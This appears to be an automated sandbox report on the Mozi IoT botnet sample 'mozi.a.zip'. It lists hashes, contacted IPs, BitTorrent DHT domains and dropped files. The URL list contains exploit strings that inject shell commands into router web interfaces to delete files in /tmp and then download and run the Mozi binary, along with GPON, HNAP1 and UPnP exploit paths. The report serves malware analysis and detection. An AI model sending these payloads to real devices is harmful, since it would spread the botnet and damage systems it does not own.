mozi.a.zip

Status: finished

Submission Time: 2021-02-06 11:34:42 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
349551
API (Web) ID:
601065
Analysis Started:

2021-02-06 11:34:42 +01:00
Analysis Finished:

2021-02-06 11:45:16 +01:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Full Report	Management Report	IOC Report	Engine	Info	Verdict	Score	Reports
				System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)		100/100
						40/61
						20/37
						19/28

IPs

IP	Country	Detection
44.60.150.38	United States
13.92.116.235	United States
175.159.53.19	Hong Kong
Click to see the 97 hidden entries
81.179.119.252	United Kingdom
104.174.200.127	United States
113.113.18.44	China
185.68.99.43	Netherlands
171.198.145.203	United States
41.232.91.226	Egypt
82.253.85.237	France
125.31.207.97	China
91.117.98.122	Spain
207.23.25.29	Canada
94.178.218.143	Ukraine
7.200.67.208	United States
55.44.238.153	United States
203.252.111.5	Korea Republic of
26.31.214.72	United States
222.46.68.216	China
152.118.36.40	Indonesia
89.89.90.95	France
35.210.136.245	United States
80.254.91.193	Malta
157.39.16.40	India
173.153.15.142	United States
117.83.171.37	China
184.253.253.190	United States
113.24.165.118	China
173.63.104.87	United States
172.101.9.198	United States
158.119.251.77	United Kingdom
90.178.36.52	Czech Republic
51.74.229.172	United States
17.73.154.133	United States
148.132.232.29	United States
42.55.27.34	China
161.118.201.239	Japan
82.129.200.140	Egypt
1.71.162.33	China
134.35.254.248	Yemen
215.164.157.85	United States
153.48.151.95	United States
177.115.79.211	Brazil
153.38.105.79	United States
209.232.145.19	United States
97.70.224.8	United States
152.125.208.240	United States
189.222.218.142	Mexico
171.159.91.232	United States
184.216.173.25	United States
187.158.144.73	Mexico
113.153.230.119	Japan
44.17.143.194	United States
133.214.150.254	Japan
93.178.240.65	Ukraine
26.254.247.139	United States
19.214.106.48	United States
118.241.245.41	Japan
180.254.89.180	Indonesia
41.91.67.149	Egypt
154.3.17.209	United States
56.182.70.51	United States
42.53.76.236	China
89.157.51.131	France
93.102.56.19	Portugal
26.220.204.225	United States
11.242.227.131	United States
158.180.15.87	United Kingdom
29.31.10.222	United States
44.209.53.252	United States
22.142.197.254	United States
26.109.230.217	United States
84.50.142.113	Estonia
178.72.69.126	Russian Federation
171.221.181.48	China
78.101.119.242	Qatar
51.190.88.233	United Kingdom
111.169.102.97	Japan
122.128.194.105	Korea Republic of
174.231.155.97	United States
126.172.220.14	Japan
84.230.234.235	Finland
144.57.215.199	Sweden
106.63.191.143	China
21.176.167.107	United States
68.238.109.13	United States
102.37.69.46	South Africa
94.185.237.35	United Kingdom
74.7.13.10	United States
86.245.98.172	France
21.245.113.206	United States
172.195.124.44	Australia
16.0.53.131	United States
9.14.171.53	United States
109.143.31.175	Belgium
66.221.30.106	United States
81.176.95.215	Russian Federation
69.20.178.197	United States
124.57.147.225	Korea Republic of
189.241.241.142	Mexico

Domains

Name	IP	Detection
dht.transmissionbt.com	212.129.33.59
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://193.248.153.76:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://47.246.22.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh
Click to see the 43 hidden entries
http://144.76.43.37:80/HNAP1/
http://24.239.192.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://34.66.226.190:80/HNAP1/
http://13.89.231.175:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://159.140.205.214:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.254.64.88:80/HNAP1/
http://23.217.12.208:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.236.242.26:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://74.79.213.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh;chmod
http://23.12.191.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://180.254.107.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://175.203.81.2:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://113.161.185.44:80/HNAP1/
http://72.200.237.136:49152/soap.cgi?service=WANIPConn1
http://schemas.xmlsoap.org/soap/envelope//
http://www.pastebin.ca.
http://purenetworks.com/HNAP1/
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/Mozi.m;
http://%s:%d/Mozi.a;sh$
http://190.189.194.46:49152/soap.cgi?service=WANIPConn1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://www.alsa-project.org.
http://HTTP/1.1
http://www.alsa-project.org
http://pastebin.ca)
http://%s:%d/Mozi.a;chmod
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://www.pastebin.ca
http://www.pastebin.ca/upload.php
http://%s:%d/Mozi.m
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1sendcmd
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

mozi.a.zip

Comments

Tags

Available tags:

Details

IPs

Domains

URLs

Dropped files

mozi.a.zip Options

Comments

Tags

Available tags:

Details

IPs

Domains

URLs

Dropped files

Search started

Yara Super Rule creation started

mozi.a.zip